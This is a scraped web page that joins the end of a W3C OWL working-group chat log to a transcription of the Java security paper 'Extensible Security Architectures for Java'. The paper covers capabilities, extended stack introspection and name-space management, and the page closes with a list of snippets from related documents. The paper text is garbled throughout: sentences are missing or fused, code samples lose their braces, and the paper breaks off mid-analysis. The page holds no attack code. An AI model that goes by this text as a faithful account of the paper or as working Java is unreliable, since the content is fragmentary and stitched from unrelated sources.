deprecate a particular view on a URI. 19:26:24 <MarkusK_> Ivan: Are there any use cases? 19:26:27 <bmotik> +1 to ivan 19:26:37 <bmotik> q+ 19:26:41 <MarkusK_> Alan: Yes, you could have a legacy document that contains a deprecated property. But you can no longer tell that that use was deprecated, and not, e.g., the class. 19:27:00 <sandro> q? 19:27:37 <MarkusK_> Ivan: Conceptually, URIs still refer to one thing, and this is what I expect to deprecate. Thus the deprecation refers to all uses of the URI. 19:27:54 <sandro> q? 19:28:01 <schneid> q+ 19:28:02 <MarkusK_> Alan: My assumption was that single uses of URIs might be deprecated. 19:28:23 <MarkusK_> Ivan: If I am in OWL Full, I also deprecate a URI. 19:28:41 <bmotik> In OWL Full, there is no distinction between a property and a class 19:28:43 <sandro> ack bmotik 19:28:44 <bmotik> Zakim, unmute me 19:28:44 <Zakim> bmotik was not muted, bmotik 19:29:20 <MarkusK_> Boris: The reason for having deprecated class and deprecated property in OWL 1 seems to be a side effect but not a very thought-through design. For instance, there is no way of deprecating individuals. I do not think that this OWL 1 deprecation was actually used a lot either. Maybe we do not require to spend more effort on this. 19:29:56 <ivan> ??? 19:30:04 <alanr_> q? 19:30:10 <schneid> zakim, unmute me 19:30:10 <Zakim> schneid was not muted, schneid 19:31:00 <schneid> zakim, mute me 19:31:00 <Zakim> schneid should now be muted 19:31:03 <MarkusK_> Schneid: One could imagine that someone wants to deprecate only the class use of a URI but not the property use, but this will probably never happen in practice. 19:31:07 <uli> bye 19:31:10 <Zhe> bye 19:31:10 <Zakim> -bmotik 19:31:11 <sandro> ADJOURNED 19:31:13 <Zakim> -alanr_ 19:31:14 <Zakim> -msmith 19:31:15 <msmith> bye 19:31:15 <Zakim> -uli 19:31:17 <Zakim> -Peter_Patel-Schneider 19:31:17 <Zakim> -Zhe 19:31:18 <msmith> msmith has left #owl 19:31:18 <Zakim> -baojie 19:31:23 <Zakim> -clu 19:31:24 <Zakim> -bcuencagrau 19:31:28 <Zakim> -Ivan 19:31:36 <ivan> ivan has left #owl 19:31:40 <uli> uli has left #owl 19:31:46 <Zakim> -Achille 19:31:52 <sandro> RRSAgent, make log public 19:32:02 <sandro> 19:32:17 <MarkusK_> Bye 19:32:17 <Zakim> -Sandro 19:32:21 <Zakim> -MarkusK_ 19:34:17 <Zakim> -schneid 19:34:18 <Zakim> SW_OWL()1:00PM has ended 19:34:20 <Zakim> Attendees were Peter_Patel-Schneider, MarkusK_, Ivan, +1.518.276.aaaa, josb, bmotik, +1.617.452.aabb, alanr_, uli, baojie, Sandro, Zhe, +0494212186aacc, clu, schneid, bcuencagrau, 19:34:23 <Zakim> ... msmith, Rinke, Achille 19:35:47 <alanr_> alanr_ has left #owl 19:42:01 <alanr> alanr has joined #owl 19:58:43 <alanr> alanr has left #owl 21:58:03 <Zakim> Zakim has left #owl | https://www.w3.org/2007/OWL/wiki/Chatlog_2008-11-12 | CC-MAIN-2017-51 | en | refinedweb |
Extensible Security Architectures for Java
- Andrea Clarke
- 1 years ago
- Views:
Transcription
1 Extensible Security Architectures for Java DAN S. WALLACH Princeton University DIRK BALFANZ Princeton University DREW DEAN Princeton University EDWARD W. FELTEN Princeton University Categories and Subject Descriptors: []: 1. INTRODUCTION [Gosling et al. 1996], JavaScript [Flanagan 1997], ActiveX [Microsoft Corporation 1996], and Shockwave [Schmitt 1997] To appear in the 16th Symposium on Operating Systems Principles, October 1997, Saint-Malo, France. Authors addresses: Our work is supported by donations from Sun Microsystems, Bellcore, and Microsoft. Dan Wallach did portions of this work at Netscape Communications Corp. Edward Felten is supported in part by an NSF National Young Investigator award.
2 [Goldstein 1996; Electric Communities 1996]. 1.1 The Advantages of Software Protection Historically, memory protection and privilege levels have been implemented in hardware: memory protection via base / limit registers, segments, or pages; and privilege levels via user / kernel mode bits or rings [Schroeder and Saltzer 1972]. Recent mobile code systems, however, rely on software rather than hardware for protection. The switch to software mechanisms is being driven by two needs: portability and performance Portability. The first argument for software protection is portability. A userlevel Performance. Second, software protection offers significantly cheaper crossdomain calls 1. [Ousterhout 1990; Anderson et al. 1991]. The time difference would be acceptable if cross-domain calls were very rare. But modern software structures, especially in mobile code systems, are leading to tighter binding between domains. To illustrate this fact, we then instrumented the Sun Java Virtual Machine (JVM) (JDK interpreter running on a 167 MHz UltraSparc) to measure the number of calls across trust boundaries, that is, the number of procedure calls in which the caller is either 1 In Unix, a system-call crosses domains between user and kernel processes. In Java, a method call between applet and system classes also crosses domains because system classes have additional privileges. 2
3 Workload time crossings crossings/sec CaffeineMark SunExamples Fig. 1. Number of trust-boundary crossings for two Java workloads. Time is the total user+system CPU time used, in seconds. Crossings is the number of method calls which cross a trust boundary. The last column is their ratio: the number of boundary crossings per CPU-second. more trusted or less trusted than the callee. We measured two workloads. CaffeineMark 2 is a widely used Java performance benchmark, and SunExamples is the sum over 29 of the 35 programs 3 on Sun s sample Java programs page 4. . 1.2 Memory Protection vs. Secure Services Most discussions of software protection in the OS community focus on memory protection: guaranteeing a program will not access memory or execute code for which it is not authorized. Software fault isolation [Wahbe et al. 1993], proof-carrying code [Necula and Lee 1996], and type-safe languages are three popular ways to ensure memory protection We omitted internationalization examples and JDK 1.1 applets. 4 3
4 1.2.1 Software Memory Protection. Wahbe et al. [1993] introduced software fault isolation. [1996] introduced proof-carrying code. [Levy 1984] and is also used in current research operating systems such as SPIN [Bershad et al. 1995]. Memory accesses can be controlled with a safe language [Milner and Tofte 1991]. [Rees 1996; Borenstein 1994] or static type checking (as is mostly the case in Java [Gosling et al. 1996; Drossopoulou and Eisenbach 1997]). Secure Services. 5. Seltzer et al. [1996] studied some of the security problems involved in creating an extensible operating system. They argue that memory protection is only part of the solution; the bulk of their paper is concerned with questions of how to provide secure services. Consider 5 GUI event manipulation may seem harmless, but observing GUI events could allow an attacker to see passwords or other sensitive information while they are typed. Generated GUI events would allow an attacker to create keystrokes to execute dangerous commands. 4
5. 2. SECURITY IN JAVA Though we could in principle use any of several mobile code technologies, we will base our analysis on the properties of Java. Java is a good choice for several reasons: it is widely used and analyzed in real systems, and full source code is available to study and modify. Java uses programming language mechanisms to enforce memory safety. The JVM enforces the Java language s type safety, preventing programs from accessing memory or calling methods without authorization [Lindholm and Yellin 1996].: Every class in the JVM which came from the network was loaded by a ClassLoader, and includes a reference to its ClassLoader. Classes which came from the local file system have a special system ClassLoader. Thus, local classes can be distinguished from remote classes by their ClassLoader. Every frame on the call stack includes a reference to the class running in that frame. Many language features, such as the default exception handler, use these stack frame annotations for debugging and diagnostics. Combined together, these two JVM implementation properties allow the security system to search for remote code on the call stack. If a ClassLoader other than the special system ClassLoader exists on the call stack, then a policy for untrusted remote code is applied. Otherwise, a policy for trusted local code is used. 5
6 monitor [Lampson 1971; National Computer Security Center 1985] [Dean et al. 1996], many developers complained that the sandbox policy, applied equally to all applets, was too inflexible to implement many desirable real applications. The systems presented here can all distinguish between different sources of programs and provide appropriate policies for each of them. 3. APPROACHES We now present three different strategies for resolving the inflexibility of the Java sandbox model. All three strategies assume the presence of digital signatures to identify what principal is responsible for the program. This principal is mapped to a security policy. After that, we have identified three different ways to enforce the policy: Capabilities. A number of traditional operating systems were based on unforgeable pointers which could be safely given to user code. Java provides a perfect environment for implementing capabilities. Extended stack introspection. The current Java method of inspecting the stack for unprivileged code can be extended to include principals on the call stack. Name space management. An interesting property of dynamic loading is the ability to create an environment where different applets see different classes with the same names. By restricting an applet s name space, we can limit its activities. In this section, we will focus on how each method implements interposition of protective code between potentially dangerous primitives and untrusted code. In section 4, we will compare these systems against a number of security-relevant criteria. 3.1 Common Underpinnings Security mechanisms can be defined by how they implement interposition: the ability to protect a component by routing all calls to it through a reference monitor. The reference monitor either rejects each call, or passes it through to the protected component; the reference monitor can use whatever policy it likes to make the decision. Since a wide variety of policies may be desirable, it would be nice if the reference monitor were structured to be extensible without being rewritten. As new subsystems need to be protected, they should be easy to add to the reference monitor. Traditionally, extensible reference monitors are built using trusted subsystems. For example, the Unix password file is read-only, and only a setuid program can edit it. In a system with domain and type enforcement [Badger et al. 1995], 6
7 [1987] offers a particularly cogent argument in favor of the use of trusted subsystems and abstraction boundaries in the security of commercial systems Digital Signatures as Principals. To implement any security policy, Java needs a notion of principal. In a traditional operating system, every user is a principal 6. For Java, we wish to perform access control based on the source of the code, rather than who is running it. This is solved by digitally signing the applet code. These signatures represent endorsements of the code by the principal who signed it 7 asserting that the code is not malicious and behaves as advertised. When a signature is verified, the principal may be attached to the class object within the JVM. Any code may later query a class for its principal. This allows a group of classes meant to cooperate together to query each others principal and verify that nothing was corrupted. Policies and Users. Each system needs a policy engine which can store security policy decisions on stable storage, answer questions about the current policy, and query the user when an immediate decision is necessary. The details of what is stored, and what form user queries take, depend on the specific abstractions defined by each system.friendly Site Administration. Another way to remove complexity from users is to move the work to their system administrators. Many organizations prefer to centrally administrate their security policy to prevent users from accidentally or maliciously violating the policy. These organizations need hooks into the Web browser s policy mechanism to either preinstall and lock down all security choices or at least to pre-approve applications used 6 Principal and target, as used in this paper, are the same as subject and object, as used in the security literature, but are more clear for discussing security in object-oriented systems. 7 Because a signature can be stripped or replaced by a third-party, there is no strong way for a signature to guarantee authorship. 7. 3.2 First Approach: Capabilities In many respects, Java provides an ideal environment to build a traditional capability system [Fabry 1974; Levy 1984]. Electric Communities [1996] and Goldstein [1996] 8 have implemented such systems. This section discusses general issues for capabilities in Java, rather than specifics of the Electric Communities or JavaSoft systems. Dating back to the 1960 s, hardware and software-based capability systems have often been seen as a good way to structure a secure operating system [Hardy 1985; Neumann et al. 1980; Tanenbaum et al. 1986]. Capabilities in Java. In early machines, capabilities were stored in tagged memory. A user program could load, store, and execute capabilities, but only the kernel could create a capability [Levy 1984]. Interposition. Java capabilities would implement interposition by providing the exclusive interface to system resources. Rather than using the File class, or the public constructor of FileInputStream, a program would be required to use a file system 8 The Java Electronic Commerce Framework (JECF) uses a capability-style interface, extending the signed applet support in JDK 1.1. More information about JavaSoft s security architecture plans can be found in Gong [1997a]. 9 For example, the combination to open a safe represents a capability. The safe has no way to verify if the combination has been stolen; any person entering the correct combination can open the door. The security of the safe depends upon the combination not being leaked by an authorized holder. 8
9 // In this example, any code wishing to open a file must first obtain // an object which implements FileSystem. interface FileSystem { public FileInputStream getinputstream(string path); // This is the primitive class for accessing the file system. Note that // the constructor is not public -- this restricts creation of these // objects to other code in the same package. public class FS implements FileSystem { FS() { public FileInputStream getinputstream(string path) { return internalopen(path); private native FileInputStream internalopen(path); // This class allows anyone holding a FileSystem to export a subset of // that file system. Calls to getinputstream() are prepended with the // desired file system root, then passed on to the internal FileSystem // capability. public class SubFS implements FileSystem { private FileSystem fs; private String rootpath; public SubFS(String rootpath, FileSystem fs) { this.rootpath = rootpath; this.fs = fs; public FileInputStream getinputstream(string path) { // to work safely, this would need to properly handle.. in path return fs.getinputstream(rootpath + "/" + path); Fig. 2. Interposition of a restricted file system root in a capability-based Java system. Both FS and SubFS implement FileSystem, the interface exported to all code which reads files. capability which it acquired on startup or through a capability broker. If a program did not receive such a capability, it would have no other way to open a file. 9
10. 3.3 Second Approach: Extended Stack Introspection This section presents an extension to Java s current stack-introspection mechanism 10. This approach is taken by both Netscape 11 and Microsoft 12 in version 4.0 of their respective browsers. JavaSoft is working on a similar design [Gong 1997b]. Basic Design. Three fundamental primitives are necessary to use extended stack introspection: enableprivilege(target) disableprivilege(target) checkprivilege(target) When a dangerous resource (such as the file system) needs to be protected, two steps are necessary: a target must be defined for the resource, and the system must call checkprivilege() on the target before accessing the protected resource. Improved Design. The design as described so far is simple, but it requires a few refinements to make it practical. First, it is clear that enabled privileges must apply only to 10 This approach is sometimes incorrectly referred to as capability-based security in some marketing literature
11trusted system libraries. It also allows local, trusted Java applications to use the same JVM without modification: they run as a trusted principal so all of their accesses are allowed by default Example: Creating a Trusted Subsystem. A trusted subsystem can be implemented as a class that enables some privileges before calling a system method to access the protected resource. Untrusted code would be unable to directly access the protected resource, since it would be unable to create the necessary enabled privilege. Figure 4 demonstrates how code for a trusted subsystem may be written.. 13 Netscape s stack introspection is currently only used in their Web browser, so compatibility with existing Java applications is not an issue. 11
12 checkprivilege(target target) { // loop, newest to oldest stack frame foreach stackframe { if(stackframe has enabled privilege for target) return Allow; if(policy engine forbids access to target by class executing in stackframe) return Forbid; // if we get here, we fell off the end of the stack if(netscape) return Forbid; if(microsoft) return Allow; Fig. 3. The stack walking algorithm used by Netscape and Microsoft. Details. The Netscape and Microsoft implementations have many additional features beyond those described above. We will attempt to describe a few of these enhancements and features here Smart Targets. Sometimes a security decision depends not only on which resource (the file system, network, etc.) is being accessed, but on which specific part of the resource is involved, for example, on exactly which file is being accessed. Since there are too many files to create targets for each one, both Microsoft and Netscape have a form of smart targets which have internal parameters and can be queried dynamically for access decisions. Details are beyond the scope of this paper Who can define targets?. The Netscape and Microsoft systems both offer a set of predefined targets that represent resources that the JVM implementation wants to protect; they also offer ways to define new targets. The Microsoft system allows only fully trusted code to define new targets, while the Netscape system allows anyone to define new targets. In the Netscape system, targets are named with a (principal, string) pair, and the system requires that the principal field match the principal who signed the code that created the target. Built-in targets belong to the predefined principal System.. 12
13 // this class shows how to implement a trusted subsystem with // stack introspection public class FS implements FileSystem { private boolean useprivs = false; public FS() { try { PrivilegeManager.checkPrivilege("UniversalFileRead"); useprivs = true; catch (ForbiddenTargetException e) { useprivs = false; public FileInputStream getinputstream(string path) { // only enable privileges if they were there when we were constructed if(useprivs) PrivilegeManager.enablePrivilege("UniversalFileRead"); return new java.io.fileinputstream(path); // this class shows how a privilege is enabled before a potentially // dangerous operation public class TrustedService { public static FileSystem getscratchspace() { PrivilegeManager.enablePrivilege("UniversalFileRead"); // SubFS class from the previous example return new SubFS("/tmp/TrustedService", new FS()); Fig. 4. This example shows how to build a FileSystem capability (see figure 2) as an example of a protected subsystem using extended stack introspection. Note that figure 2 s SubFS can work unmodified with this example. Principal user System System System System System Privileges UntrustedApplet() SubFS.getInputStream() FS.getInputStream() +UniversalFileRead new FileInputStream() SecurityManager.checkRead() PrivilegeManager.checkPrivilege() Fig. 5. This figure shows the call stack (growing downward) for a file system access by an applet using the code in figure 4. The grey areas represent stack frames running with the UniversalFileRead privilege enabled. Note that the top system frames on the stack can run unprivileged, even though those classes have the system principal. 13
14 Signing Details. Microsoft and Netscape also differ over their handling of digital signatures. In the Microsoft system, each bundle of code carries at most one signature 14, and the signature contains a list of targets that the signer thinks the code should be given access to. Before the code is loaded, the browser asks the policy engine whether the signer is authorized to access the requested targets; if so, the code is loaded and given the requested permissions.. 3.4 Third Approach: Name Space Management This section presents a modification to Java s dynamic linking mechanism which can be used to hide or replace the classes seen by an applet as it runs. We have implemented a full system based on name space management, as an extension to Microsoft Internet Explorer 3.0. Our implementation did not modify the JVM itself, but changed several classes in the Java library. The full system is implemented in 4500 lines of Java, most of which manages the user interface. We first give an overview of what name space management is and how it can be used as a security mechanism. Then we describe our implementation in detail. 14 Actually, a sequence of signatures is allowed, but the present implementation recognizes only the first one. 14
15 Original name Alice Bob java.net.socket security.socket java.net.socket java.io.file security.file Fig. 6. Different principals see different name spaces. In this example, code signed by Alice cannot see the File class, and for Bob it has been replaced with compatible subclasses Design. With name space management, we enforce a given security policy by controlling how names in a program are resolved into runtime classes. We can either remove a class entirely from the name space (thus causing attempts to use the class to fail), or we can cause its name to refer to a different class which is compatible with the original. This technique is used in Safe-Tcl [Borenstein 1994] to hide commands in an untrusted interpreter. Plan 9 [Pike et al. 1990] can similarly attach different programs and services to the file system viewed by an untrusted process. In an object-oriented language, classes represent resources we wish to control. For example, a File class may represent the file system and a Socket class may represent networking operations. If the File class, and any other class which may refer to the file system, is not visible when the remote code is linked to local classes, then the file system will not be available to be attacked. Instead, an attempt to reference the file system would be equivalent to a reference to a class which did not exist at all; an error or exception would be triggered. To implement interesting security policies, we can create environments which replace sensitive classes with compatible ones that check their arguments and conditionally call the original classes. These new classes can see the original sensitive classes, but the mobile code cannot. For example, a File class could be replaced with one that prepended the name of a subdirectory (see figure 6), much like the capability-based example in figure 2. In both cases, only a sub-tree of the file system is visible to the untrusted mobile code. In order for the program to continue working correctly, each substituted class must be compatible with the original class it replaces (i.e., the replacement must be a subclass of the original). To make name space management work as a flexible and general access control scheme, we introduce the notion of a configuration, which is a mapping from class names to implementations (i.e., Java class files). These configurations correspond to the privilege groups discussed in section When mobile code is loaded, the policy engine determines which configuration is used for the code s name space, as a function of its principal. If the principals have not yet been seen by the system, the user is consulted for the appropriate configuration. An interesting property of this system is that all security decisions are made statically, before the mobile code begins execution. Once a class has been hidden or replaced, there is no way to get it back Implementation in Java. Name space management in Java is accomplished through modifying the Java ClassLoader. A ClassLoader is used to provide the name implementation mapping. Every class keeps a reference to a ClassLoader which is consulted for dynamic binding to other classes in the Java runtime. Whenever a new class is referenced, the ClassLoader provides the implementation of the new class (see figure 7). 15
16 Foo.java... FileSystem fs = new FileSystem(); File f = fs.openfile applet class loader System Fig. 7. A ClassLoader resolves every class in an applet. If these classes reference more classes, the same ClassLoader is used. Foo.java... FileSystem fs = new FileSystem(); File f = fs.openfile System PCL Alice Alice Policy Engine Fig. 8. Changing the name space: A PrincipalClassLoader (PCL) replaces the original class loader. The class implementation returned depends on the principal associated with the PrincipalClassLoader and the configuration in effect for that principal. Usually in a Web browser, an AppletClassLoader is created for each applet. The Applet- ClassLoader will normally first try to resolve a class name against the system classes (such as java.io.file) which ship with the browser. If that fails, it will look for other classes from the same network source as the applet. If two applets from separate network locations reference classes with the same name that are not system classes, each will see a different implementation because each applet s AppletClassLoader looks to separate locations for class implementations. Our implementation works similarly, except we replace each applet s AppletClassLoader with a PrincipalClassLoader which enforces the configuration appropriate for the principals attached to that class (see figure 8). When resolving a class reference, a Principal- ClassLoader can (1) throw a ClassNotFoundException if the calling principal is not supposed to see the class at all (exactly the same behavior that the applet would see if the class had been removed from the class library this is essentially a link-time error), (2) return the class in question if the calling principal has full access to it, or (3) return a subclass, as specified in the configuration for the applet s principal. In the third case we hide the expected class by binding its name to a subclass of the original class. Figure 9 shows a class, security.file, which can replace java.io.file. 16
17 When an applet calls new java.io.file("foo"), it will actually get an instance of security.file, which is compatible in every way with the original class, except it restricts file system access to a subdirectory. It might appear that this could be circumvented by using Java s super keyword. However, Java bytecode has no notion of super, which is resolved entirely at compile time. Note that, to achieve complete protection, other classes such as FileInputStream, RandomAccessFile, etc. need to be replaced as well, as they also allow access to the file system. Name space management also allows third-party trusted subsystems to be distributed as part of untrusted applets (see section 3.3.3). The classes of the trusted subsystem will have different principals from the rest of the applet. Thus, those classes may be allowed to see the real classes which are hidden from other applet classes. The viability of name space management is unknown for future Java systems. New Java features such as the reflection API (a feature of JDK 1.1 which allows dynamic inquiry and invocation of a class s methods) could defeat name space management entirely. Also, classes which are shared among separate subsystems may be impossible to rename without breaking things (e.g., both file system and networking classes use InputStream and OutputStream). Both reflection and the class libraries could be redesigned to work properly with name space management. package security; public class File extends java.io.file { // Note that System.getUser() would not be available in a system // purely based on name space management. In the current // implementation, getuser() examines the call stack for a // PrincipalClassLoader. A cleaner implementation would want to // generate classes on the fly with different hard-coded prefixes. private String fixpath(string path) { // to work safely, this would need to properly handle.. in path return "/tmp/" + System.getUser().getName() + "/" + path; public File(String path) { super(fixpath(path)); public File(String path, String name) { super(fixpath(path), name); Fig. 9. Interposition in a system with name space management. We assume that at runtime we can find out who the currently running principal is. 4. ANALYSIS Now that we have presented three systems, we need a set of criteria to evaluate them. This list is derived from Saltzer and Schroeder [1975]. 17
18 Economy of mechanism. Designs which are smaller and simpler are easier to inspect and trust. Fail-safe defaults. By default, access should be denied unless it is explicitly granted. Complete mediation. Every access to every object should be checked. Least privilege. Every program should operate with the minimum set of privileges necessary to do its job. This prevents accidental mistakes becoming security problems. Least common mechanism. Anything which is shared among different programs can be a path for communication and a potential security hole, so as little data as possible should be shared. Accountability. The system should be able to accurately record who is responsible for using a particular privilege. Psychological acceptability. The system should not place an undue burden on its users. Several other practical issues arise when designing a security system for Java. Performance. We must consider how our designs constrain system performance. Security checks which must be performed at run-time will have performance costs. Compatibility. We must consider the number and depth of changes necessary to integrate the security system with the existing Java virtual machine and standard libraries. Some changes may be impractical. Remote calls. If the security system can be extended cleanly to remote method invocation, that would be a benefit for building secure, distributed systems. We will now consider each criterion in sequence. 4.1 Economy of Mechanism Of all the systems presented, name space management is possibly the simplest. The implementation requires redesigning the ClassLoader as well as tracking the different name space configurations. The mechanisms that remove and replace classes, and hence provide for interposition, are minimal. However, they affect critical parts of the JVM and a bug in this code could open the system to attack. Extended stack introspection requires some complex changes to the virtual machine. As before, changes to the JVM could destabilize the whole system. Each class to be protected must explicitly consult the security system to see if it has been invoked by an authorized party. This check adds exactly one line of code, so its complexity is analogous to the configuration table in name space management. And, as with name space management, any security-relevant class which has not been modified to consult the security system can be an avenue for system compromise. Unmodified capabilities are also quite simple, but they have well-known problems with confinement (see section 4.3). A capability system modified to control the propagation of capabilities would have a more complex implementation, possibly requiring stack introspection or name space management to work properly. A fully capability-based Java would additionally require redesigning the Java class libraries to present a capability-style interface a significant departure from the current APIs, although capability-style classes ( factories ) are used internally in some Java APIs. An interesting issue with all three systems is how well they enable code auditing how easy it is for an implementor to study the code and gain confidence in its correctness. Name 18
19 space management includes a nice list of classes which must be inspected for correctness. With both capabilities and stack introspection, simple text searching tools such as grep can locate where privileges are acquired, and the propagation of these privileges must be carefully studied by hand. Capabilities can potentially propagate anywhere in the system. Stack annotations, however, are much more limited in their ability to propagate. 4.2 Fail-safe Defaults Name space management and stack introspection have similar fail-safe behavior. If a potentially dangerous system resource has been properly modified to work with the system, it will default to deny access. With name space management, the protected resource cannot be named by a program, so it is not reachable. With stack introspection, requests to enable a privilege will fail by default. Likewise, when no enabled privilege is found on the stack, access to the resource will be denied by default. (Microsoft sacrifices this property for compatibility reasons.) In a fully capability-based system, a program cannot do anything unless an appropriate capability is available. In this respect, a capability system has very good fail-safe behavior. 4.3 Complete Mediation Barring oversights or implementation errors (discussed in sections 4.1 and 4.2), all three systems provide mechanisms to interpose security checks between identified targets and anyone who tries to use them. However, an important issue is confinement of privileges [Lampson 1973]. It should not generally be possible for one program to delegate a privilege to another program (that right should also be mediated by the system). This is the fundamental flaw in an unmodified capability system; two programs which can communicate object references can share their capabilities without system mediation. This means that any code which is granted a capability must be trusted to care for it properly. In a mobile code system, the number of such trusted programs is unbounded. Thus, it may be impossible to ever trust a simple capability system. Likewise, mechanisms must be in place to revoke a capability after it is granted. Many extensions to capabilities have been proposed to address these concerns. Kain and Landwehr [1987] proposes a taxonomy for extensions and survey many systems which implement them. Fundamentally, extended capability systems must either place restrictions on how capabilities can be used, or must place restrictions on how capabilities can be shared. Some systems, such as ICAP [Gong 1989], make capabilities aware of who called them; they can know who they belong to and become useless to anyone else. The IBM System/38 [Berstis et al. 1980] associates optional access control lists with its capabilities, accomplishing the same purpose. Other systems use hardware mechanisms to block the sharing of capabilities [Karger and Herbert 1984]. 19
20. 4.4 Least Privilege The principle of least privilege applies in remarkably different ways to each system we consider. With name space management, privileges are established when the program is linked. If those privileges are too strong, there is no way to revoke them later once a class name is resolved into an implementation, there is no way to unlink it. In contrast, capabilities have very desirable properties. If a program wishes to discard a capability, it only needs to discard its reference to the capability. Likewise, if a method only needs a subset of the program s capabilities, the appropriate subset of capabilities may be passed as arguments to the method, and it will have no way of seeing any others. If a capability needs to be passed through the system and then back to the program through a call-back (a common paradigm in GUI applications), the capability can be wrapped in another Java object with non-public access methods. Java s package scoping mechanism provides the necessary semantics to prevent the intermediate code from using the capability. Stack introspection provides an interesting middle-ground. A program which enables a privilege and calls a method is implicitly passing a capability to that method. If a privilege is not enabled, the corresponding target cannot be used. This allows straightforward auditing of system code to verify that privileges are enabled only for a limited time and used safely. If a call path does not cross a method that enables its privileges, then that call path cannot possibly use the privilege by accident. Also, there is a disableprivilege() method which can explicitly remove a privilege before calling into untrusted code. Most importantly, when the method which enabled a privilege exits, the privilege disappears with it. This limits the lifetime of a privilege. 4.5 Least Common Mechanism The principle of least common mechanism concerns the dangers of sharing state among different programs. If one program can corrupt the shared state, it can then corrupt other programs which depend on it. This problem applies equally to all three Java-based systems. An example of this problem was Hopwood s interface attack [Dean et al. 1996], which combined a bug in Java s interface mechanism with a shared public variable to ultimately break the type system, and thus circumvent system security. This principle is also meant to discuss the notion of covert storage channels [Lampson 1973], an issue in the design of multi-level secure systems [National Computer Security 20
A Java Filter. Edward W. Felten. Dirk Balfanz. Abstract. 1 Introduction
A Java Filter Dirk Balfanz Princeton University [email protected] Edward W. Felten Princeton University [email protected] Abstract Rogue Java applets are currently a major concern for big
Access Control Fundamentals
C H A P T E R 2 Access Control Fundamentals An access enforcement mechanism authorizes requests (e.g., system calls) from multiple subjects (e.g., users, processes, etc.) to perform operations (e.g., read,,
Java History. Java History (cont'd)
Java History Created by James Gosling et. al. at Sun Microsystems in 1991 "The Green Team" Were to investigate "convergence" technologies Gosling created a processor-independent language for '*7', a 2-way
Restraining Execution Environments
Restraining Execution Environments Segurança em Sistemas Informáticos André Gonçalves Contents Overview Java Virtual Machine: Overview The Basic Parts Security Sandbox Mechanisms Sandbox Memory Native
APPLETS AND NETWORK SECURITY: A MANAGEMENT OVERVIEW
84-10-25 DATA SECURITY MANAGEMENT APPLETS AND NETWORK SECURITY: A MANAGEMENT OVERVIEW Al Berg INSIDE Applets and the Web, The Security Issue, Java: Secure Applets, Java: Holes and Bugs, Denial-of-Service
Characteristics of Java (Optional) Y. Daniel Liang Supplement for Introduction to Java Programming
Characteristics of Java (Optional) Y. Daniel Liang Supplement for Introduction to Java Programming Java has become enormously popular. Java s rapid rise and wide acceptance can be traced to its design
CMSC 421, Operating Systems. Fall 2008. Security. URL:. Dr. Kalpakis
CMSC 421, Operating Systems. Fall 2008 Security Dr. Kalpakis URL: Outline The Security Problem Authentication Program Threats System Threats Securing Systems
Chapter
Building Applications Using Micro Focus COBOL
Building Applications Using Micro Focus COBOL Abstract If you look through the Micro Focus COBOL documentation, you will see many different executable file types referenced: int, gnt, exe, dll and others.
Flexible Policy-Directed Code Safety
To appear in IEEE Security and Privacy, Oakland, CA. May 9-12, 1999. Flexible Policy-Directed Code Safety David Evans [email protected] Andrew Twyman [email protected] MIT Laboratory for Computer
Columbia University Web Security Standards and Practices. Objective and Scope
Columbia University Web Security Standards and Practices Objective and Scope Effective Date: January 2011 This Web Security Standards and Practices document establishes a baseline of security related requirements
Chapter 3: Operating-System Structures. System Components Operating System Services System Calls System Programs System Structure Virtual Machines
Chapter 3: Operating-System Structures System Components Operating System Services System Calls System Programs System Structure Virtual Machines Operating System Concepts 3.1 Common System Components
SW5706 Application deployment problems
SW5706 This presentation will focus on application deployment problem determination on WebSphere Application Server V6. SW5706G11_AppDeployProblems.ppt Page 1 of 20 Unit objectives After completing this
Security Vulnerability Notice
Security Vulnerability Notice SE-2014-01-ORACLE [Security vulnerabilities in Oracle Database Java VM, Issues 1-20] DISCLAIMER INFORMATION PROVIDED IN THIS DOCUMENT IS PROVIDED "AS IS" WITHOUT WARRANTY
JAVA WEB START OVERVIEW
JAVA WEB START OVERVIEW White Paper May 2005 Sun Microsystems, Inc. Table of Contents Table of Contents 1 Introduction................................................................. 1 2 A Java Web Start
CSE543 - Introduction to Computer and Network Security. Module: Reference Monitor
CSE543 - Introduction to Computer and Network Security Module: Reference Monitor Professor Trent Jaeger 1 Living with Vulnerabilities So, software is potentially vulnerable In a variety of ways So, how
FRONT FLYLEAF PAGE. This page has been intentionally left blank
FRONT FLYLEAF PAGE This page has been intentionally left blank Abstract The research performed under this publication will combine virtualization technology with current kernel debugging techniques to
Last update: February 23, 2004
Last update: February 23, 2004 Web Security Glossary The Web Security Glossary is an alphabetical index of terms and terminology relating to web application security. The purpose of the Glossary is to
Last Class: OS and Computer Architecture. Last Class: OS and Computer Architecture
Last Class: OS and Computer Architecture System bus Network card CPU, memory, I/O devices, network card, system bus Lecture 3, page 1 Last Class: OS and Computer Architecture OS Service Protection Interrupts
UNCLASSIFIED Version 1.0 May 2012
Secure By Default: Platforms Computing platforms contain vulnerabilities that can be exploited for malicious purposes. Often exploitation does not require a high degree of expertise, as tools and advice
Frequently Asked Questions
Frequently Asked Questions Minimum System Requirements What do I need to host or attend a meeting using Microsoft Windows? What do I need to host or attend a meeting using Mac OS? What do I need to host
Operating System Structures
COP 4610: Introduction to Operating Systems (Spring 2015) Operating System Structures Zhi Wang Florida State University Content Operating system services User interface System calls System programs Operating
An Overview of Java. overview-1
An Overview of Java overview-1 Contents What is Java Major Java features Java virtual machine Java programming language Java class libraries (API) GUI Support in Java Networking and Threads in Java overview-2
An Easier Way for Cross-Platform Data Acquisition Application Development
An Easier Way for Cross-Platform Data Acquisition Application Development For industrial automation and measurement system developers, software technology continues making rapid progress. Software engineers
6.857 Computer and Network Security Fall Term, 1997 Lecture 17 : 30 October 1997 Lecturer: Ron Rivest Scribe: Alex Hartemink 1 Preliminaries 1.1 Handouts Graded Problem Set 5 returned Solutions to Problem
Capability-Based Access Control
Lecture Notes (Syracuse University) Capability: 1 Capability-Based Access Control 1 An Analogy: Bank Analogy We would like to use an example to illustrate the need for capabilities. In the following bank
Sandy. The Malicious Exploit Analysis. Static Analysis and Dynamic exploit analysis. Garage4Hackers
Sandy The Malicious Exploit Analysis. Static Analysis and Dynamic exploit analysis About Me! I work as a Researcher for a Global Threat Research firm.! Spoke at the few security,
Adobe Flash Player and Adobe AIR security
Adobe Flash Player and Adobe AIR security Both Adobe Flash Platform runtimes Flash Player and AIR include built-in security and privacy features to provide strong protection for your data and privacy,
Kernel Types System Calls. Operating Systems. Autumn 2013 CS4023
